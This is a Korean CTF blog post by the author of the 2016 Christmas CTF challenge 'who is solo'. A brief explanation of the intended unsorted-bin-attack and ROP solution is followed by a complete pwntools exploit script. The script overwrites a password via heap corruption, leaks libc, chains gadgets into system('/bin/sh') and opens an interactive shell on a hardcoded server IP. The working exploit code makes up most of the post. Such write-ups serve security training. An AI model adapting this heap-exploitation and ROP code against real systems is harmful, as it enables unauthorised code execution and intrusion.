-
[christmas ctf 2016] who is solo 문제풀이CTF 2016. 12. 25. 16:50
광준이형 덕분에 크리스마스 씨티엪에 문제를 낼 기회가 생겼다! 감사합니다 형 :)
그냥 stack overflow문제는 뻔하고, unsorted bin attack으로 password 덮어주고 64bit rop 통해서 password 담아낸걸 릭해내고 오프셋 계산을 통해 system, pop 가젯을 구해서 익스플로잇 하는 문제임!
unsorted bin attack 만 알면 풀 수 있는데, 사람들이 잘 몰랐던것 같다. 익스가 좀 귀찮긴한듯..
ㄹㅇ 사람들 다 fastbin으로 password 덮어서 ROP로 GOT libc 릭해서 품 ㅂㄷㅂㄷ
Full RELRO랑 스태틱컴파일해서 낼걸
아이디어가 하나있었는데 문제만들고 익스가 넘 힘들어서 포기했고ㅠㅠㅠㅠ
플래그는 내 현실을 빗대어 작성함;; ㄹㅇ 후..
이 문젠 총 9팀이품!
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145from pwn import *p = remote("52.175.144.148",9901)password = 0x602080#offset = 0x4647Coffset1 = 0x046428magic_gadget = 0def malloc():print p.recvuntil("$ ")p.sendline("1")print p.recvuntil("Allocate Chunk Number: ")p.sendline("1")print p.recvuntil("Input Size: ")p.sendline("128")print p.recvuntil("Input Data: ")p.sendline("AAAA")print p.recvuntil("$ ")p.sendline("1")print p.recvuntil("Allocate Chunk Number: ")p.sendline("2")print p.recvuntil("Input Size: ")p.sendline("128")print p.recvuntil("Input Data: ")p.sendline("AAAA")print p.recvuntil("$ ")p.sendline("1")print p.recvuntil("Allocate Chunk Number: ")p.sendline("3")print p.recvuntil("Input Size: ")p.sendline("128")print p.recvuntil("Input Data: ")p.sendline("AAAA")def leak_free():print p.recvuntil("$ ")p.sendline("2")print p.recvuntil("Free Chunk number: ")p.sendline("2")def get_leak():global magic_gadgetprint p.recvuntil("$ ")p.sendline("3")print p.recvuntil("Chunk: ")p.sendline("2")print p.recvuntil("Data : ")libc_leak = u64(p.recv(8))libc_leak = int(str(hex(libc_leak))[5:],16)libc_base = libc_leak - 0x3be7b8magic_gadget = libc_base + offset1# print "[*] LIBC LEAK: " + hex(libc_leak)print "[*] LIBC BASE: " + hex(libc_base)print "[*] Magic: " + hex(magic_gadget)def pass_overwrite():print p.recvuntil("$ ")p.sendline("201527")print p.recvuntil("Modify Data: ")payload = "A"*136payload += p64(0xa1)payload += p64(0x1)payload += p64(password - 16)p.sendline(payload)print p.recvuntil("$ ")p.sendline("1")print p.recvuntil("Allocate Chunk Number: ")p.sendline("4")print p.recvuntil("Input Size: ")p.sendline("144")print p.recvuntil("Input Data: ")p.sendline("A")def exploit():printf_plt = 0x400600poprdi = 0x4008a0print p.recvuntil("$ ")p.sendline("4")print p.recvuntil("Input password: ")payload = "A"*1032payload += p64(poprdi)payload += p64(password)payload += p64(printf_plt)payload += p64(0x400680)p.sendline(payload)p.sendline("6")print p.recvuntil("$ ")leak = u64(p.recv(6).ljust(8,'\x00'))log.info("main_arena: " + hex(leak))libc_base = leak - 0x3be7b8# log.info("libc_base: " + hex(libc_base))# one_shot = libc_base + 0x46428poprdi = 0x4008A0poprsi = libc_base + 0x10809Apoprdx = libc_base + 0xBCDF0poprcx = libc_base + 0x0830AElibc_system = libc_base + 0x46590read_plt = 0x400610binsh = "/bin/sh\x00"# log.info("One shot: " + hex(one_shot))print p.recvuntil("$ ")p.sendline("4")print p.recvuntil("password: ")payload = "A"*1032payload += p64(poprdi)payload += p64(0)payload += p64(poprsi)payload += p64(0x602060)payload += p64(poprdx)payload += p64(len(binsh)+1)payload += p64(read_plt)payload += p64(poprdi)payload += p64(0x602060)payload += p64(libc_system)p.sendline(payload)print p.recvuntil("exit")p.sendline("6")p.sendline("sh")if __name__ == "__main__":raw_input()malloc()leak_free()#get_leak()pass_overwrite()exploit()p.interactive()cs 'CTF' 카테고리의 다른 글
[BoB CTF] casino (0) 2017.01.04 [BoB CTF] megabox (0) 2017.01.04 HoldyShield Pwn400 diary (0) 2016.12.22 HolyShield pwn100 (0) 2016.12.20 HolyShield 2016 PPC (0) 2016.12.20